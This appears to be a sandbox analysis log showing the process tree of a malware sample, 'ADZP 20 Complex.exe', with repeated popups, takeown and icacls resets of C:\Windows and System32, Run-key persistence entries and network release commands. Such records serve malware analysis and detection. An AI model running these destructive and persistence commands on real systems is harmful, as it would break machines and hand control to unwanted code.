C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado9⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado9⤵
-
C:\Windows\system32\msg.exemsg * Has Sido Hackeado!9⤵
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"9⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\659D.tmp\659D.tmp\659E.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""10⤵
-
C:\Windows\system32\notepad.exenotepad9⤵
-
C:\Windows\system32\calc.execalc9⤵
-
C:\Windows\explorer.exeexplorer.exe9⤵
-
C:\Windows\system32\mspaint.exemspaint.exe9⤵
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"9⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\8EFE.tmp\8EFF.tmp\8F00.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""10⤵
-
C:\Windows\system32\notepad.exenotepad9⤵
-
C:\Windows\system32\calc.execalc9⤵
-
C:\Windows\explorer.exeexplorer.exe9⤵
-
C:\Windows\system32\mspaint.exemspaint.exe9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\system32\notepad.exenotepad7⤵
-
C:\Windows\system32\calc.execalc7⤵
-
C:\Windows\explorer.exeexplorer.exe7⤵
-
C:\Windows\system32\mspaint.exemspaint.exe7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵
-
C:\Windows\system32\mspaint.exemspaint.exe5⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Windows\explorer.exeexplorer.exe5⤵
-
C:\Windows\system32\calc.execalc5⤵
- Modifies registry class
-
C:\Windows\explorer.exeexplorer.exe5⤵
- Modifies registry class
-
C:\Windows\system32\mspaint.exemspaint.exe5⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"5⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"5⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"5⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"5⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"5⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"5⤵
-
C:\Windows\system32\notepad.exenotepad3⤵
-
C:\Windows\system32\calc.execalc3⤵
-
C:\Windows\explorer.exeexplorer.exe3⤵
- Modifies registry class
-
C:\Windows\system32\mspaint.exemspaint.exe3⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\BDF6.tmp\BDF7.tmp\BDF8.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""4⤵
- Checks computer location settings
- Drops autorun.inf file
- Modifies registry class
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat5⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\tree.comtree "C:\Windows"6⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q6⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r6⤵
- Modifies file permissions
-
C:\Windows\system32\tree.comtree "C:\Windows\System32"6⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q6⤵
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r6⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\tree.comtree "C:\Windows"6⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q6⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r6⤵
- Modifies file permissions
-
C:\Windows\system32\tree.comtree "C:\Windows\System32"6⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q6⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r6⤵
-
C:\Windows\system32\tree.comtree "C:\Windows"6⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q6⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r6⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r6⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\tree.comtree "C:\Windows"6⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q6⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q6⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\tree.comtree "C:\Windows\System32"6⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r6⤵
-
C:\Windows\system32\tree.comtree "C:\Windows\System32"6⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q6⤵
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r6⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\tree.comtree "C:\Windows"6⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r6⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q6⤵
-
C:\Windows\system32\tree.comtree "C:\Windows\System32"6⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r6⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q6⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q6⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\tree.comtree "C:\Windows"6⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r6⤵
- Modifies file permissions
-
C:\Windows\system32\tree.comtree "C:\Windows\System32"6⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q6⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q6⤵
- Modifies file permissions
-
C:\Windows\system32\tree.comtree "C:\Windows"6⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r6⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q6⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\tree.comtree "C:\Windows\System32"6⤵
-
C:\Windows\system32\tree.comtree "C:\Windows"6⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r6⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q6⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r6⤵
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r6⤵
- Modifies file permissions
-
C:\Windows\system32\tree.comtree "C:\Windows\System32"6⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q6⤵
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r6⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\tree.comtree "C:\Windows"6⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q6⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r6⤵
- Modifies file permissions
-
C:\Windows\system32\tree.comtree "C:\Windows\System32"6⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r6⤵
-
C:\Windows\system32\tree.comtree "C:\Windows"6⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q6⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q6⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r6⤵
-
C:\Windows\system32\tree.comtree "C:\Windows"6⤵
-
C:\Windows\system32\tree.comtree "C:\Windows\System32"6⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r6⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q6⤵
-
C:\Windows\system32\tree.comtree "C:\Windows\System32"6⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q6⤵
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r6⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q6⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r6⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r6⤵
- Modifies file permissions
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r6⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q6⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\tree.comtree "C:\Windows"6⤵
-
C:\Windows\system32\tree.comtree "C:\Windows\System32"6⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r6⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q6⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q6⤵
-
C:\Windows\system32\tree.comtree "C:\Windows"6⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r6⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f5⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f5⤵
-
C:\Windows\system32\ipconfig.exeipconfig /release5⤵
- Gathers network information
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f5⤵
- Kills process with taskkill
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"5⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"5⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"5⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"5⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"5⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"5⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"5⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"5⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"5⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"5⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado5⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado5⤵
-
C:\Windows\system32\msg.exemsg * Has Sido Hackeado!5⤵
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"5⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\158.tmp\159.tmp\169.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""6⤵
- Checks computer location settings
- Drops autorun.inf file
- Modifies registry class
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"7⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat7⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r8⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f7⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f7⤵
-
C:\Windows\system32\ipconfig.exeipconfig /release7⤵
- Gathers network information
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado7⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado7⤵
-
C:\Windows\system32\msg.exemsg * Has Sido Hackeado!7⤵
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"7⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\E54F.tmp\E550.tmp\E551.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""8⤵
- Checks computer location settings
- Drops autorun.inf file
- Modifies registry class
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"9⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat9⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f9⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f9⤵
-
C:\Windows\system32\ipconfig.exeipconfig /release9⤵
- Gathers network information
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f9⤵
- Kills process with taskkill
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
- Modifies registry class
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado9⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado9⤵
-
C:\Windows\system32\msg.exemsg * Has Sido Hackeado!9⤵
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"9⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\7F58.tmp\7F68.tmp\7F69.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""10⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"11⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat11⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r12⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f11⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f11⤵
-
C:\Windows\system32\ipconfig.exeipconfig /release11⤵
- Gathers network information
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f11⤵
- Kills process with taskkill
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"11⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"11⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"11⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"11⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"11⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado11⤵
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"11⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\4038.tmp\4039.tmp\403A.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""12⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"13⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat13⤵
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f13⤵
-
C:\Windows\system32\notepad.exenotepad11⤵
-
C:\Windows\system32\calc.execalc11⤵
-
C:\Windows\explorer.exeexplorer.exe11⤵
-
C:\Windows\system32\mspaint.exemspaint.exe11⤵
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"11⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\C774.tmp\C775.tmp\C776.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""12⤵
-
C:\Windows\system32\notepad.exenotepad11⤵
-
C:\Windows\system32\calc.execalc11⤵
-
C:\Windows\explorer.exeexplorer.exe11⤵
-
C:\Windows\system32\mspaint.exemspaint.exe11⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"11⤵
-
C:\Windows\system32\notepad.exenotepad9⤵
-
C:\Windows\system32\calc.execalc9⤵
-
C:\Windows\explorer.exeexplorer.exe9⤵
-
C:\Windows\system32\mspaint.exemspaint.exe9⤵
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"9⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\908E.tmp\908F.tmp\9090.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""10⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"11⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat11⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r12⤵
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f11⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f11⤵
-
C:\Windows\system32\ipconfig.exeipconfig /release11⤵
- Gathers network information
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f11⤵
- Kills process with taskkill
-
C:\Windows\system32\notepad.exenotepad9⤵
-
C:\Windows\system32\mspaint.exemspaint.exe9⤵
-
C:\Windows\explorer.exeexplorer.exe9⤵
-
C:\Windows\system32\calc.execalc9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\system32\notepad.exenotepad7⤵
-
C:\Windows\system32\calc.execalc7⤵
- Modifies registry class
-
C:\Windows\explorer.exeexplorer.exe7⤵
-
C:\Windows\system32\mspaint.exemspaint.exe7⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"7⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\EEB5.tmp\EEB6.tmp\EEB7.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""8⤵
- Checks computer location settings
- Drops autorun.inf file
- Modifies registry class
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"9⤵
-
